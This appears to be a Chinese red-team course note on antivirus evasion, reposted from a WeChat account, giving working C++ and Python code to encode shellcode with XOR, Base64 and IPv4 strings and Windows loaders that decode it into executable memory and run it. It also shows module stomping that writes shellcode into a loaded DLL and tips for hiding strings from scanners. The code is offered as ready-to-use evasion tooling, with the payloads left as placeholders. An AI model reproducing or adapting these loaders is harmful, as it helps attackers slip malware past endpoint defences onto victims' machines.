1.shellcode加解密
异或
encode.cpp:
Copy
#include <iostream>
#include <windows.h>
int main() {
unsigned char buf[] = "shellcode";
for (int i = 0; i < sizeof buf; i++) {
printf("\x%x", buf[i]^0xcb);
}
}
loader.cpp:
Copy
#include <windows.h>
int main() {
unsigned char payload[] = "payload";
for (int i = 0; i < sizeof payload; i++) {
payload[i] = payload[i] ^ 0xcb;
}
void* p = VirtualAlloc(NULL, sizeof(payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
memcpy(p, payload, sizeof(payload));
((void(*)())p)();
}
Base64
encode.py:
Copy
import base64
f = open('payload.bin', 'rb')
shellcode = f.read();
f.close()
print(base64.b64encode(shellcode));
loader.cpp:
Copy
#include <windows.h>
#pragma comment (lib, "Crypt32.lib")
int main(void) {
const char payload[] = "payload";
DWORD payloadLen = sizeof(payload);
LPVOID p = VirtualAlloc(0, payloadLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
CryptStringToBinaryA(payload, payloadLen, CRYPT_STRING_BASE64, (BYTE*)p, &payloadLen, NULL, NULL);
DWORD OldProtect;
VirtualProtect(p, payloadLen, PAGE_EXECUTE_READ, &OldProtect);
((void(*)())p)();
return 0;
}
IPv4
encode.py:
Copy
from ipaddress import ip_address
f = open('payload.bin', 'rb')
shellcode = f.read();
f.close()
# 长度补充到4的整数倍
remainder = len(shellcode) % 4;
shellcode += b'x00' * (4-remainder)
i = 0
while i < len(shellcode):
print('"' + str(ip_address(shellcode[i:i+4])) + '",')
i += 4
loader.cpp:
Copy
#include <windows.h>
#include <Ip2string.h>
#pragma comment(lib, "Ntdll.lib")
int main() {
const char* IPv4s[] = {payload};
void* p = VirtualAlloc(NULL, 1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
DWORD_PTR p2 = (DWORD_PTR)p;
PCSTR Terminator = NULL;
for (int i = 0; i < sizeof(IPv4s)/sizeof(IPv4s[0]); i++) {
RtlIpv4StringToAddressA((PCSTR)IPv4s[i], FALSE, &Terminator, (in_addr*)p2);
p2 += 4;
}
((void(*)())p)();
return 0;
}
uuid、RC4、AES
2.高级方式
网络分离
Socket获取
WinHttp获取
字符串隐藏
直接用字符串会被扫描到,可以将字符串拆成字符数组
模板踩踏
RWX 很可疑,可以将 shellcode 写入 DLL 中执行
Copy
#include <windows.h>
int main() {
unsigned char buf[] = "shellcode";
PVOID dllAddr = (PVOID)(LoadLibrary(L"srvcli") + 0x1000);
DWORD oldProtect;
VirtualProtect(dllAddr, sizeof(buf), PAGE_READWRITE, &oldProtect);
memcpy(dllAddr, buf, sizeof(buf));
VirtualProtect(dllAddr, sizeof(buf), oldProtect, &oldProtect);
((void(*)())dllAddr)();
return 0;
}
本文为免杀三期学员笔记:https://www.cnblogs.com/Night-Tac/articles/17381900.html
课程链接如下
关注大佬:
原文始发于微信公众号(红队蓝军):shellcode加解密loader
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论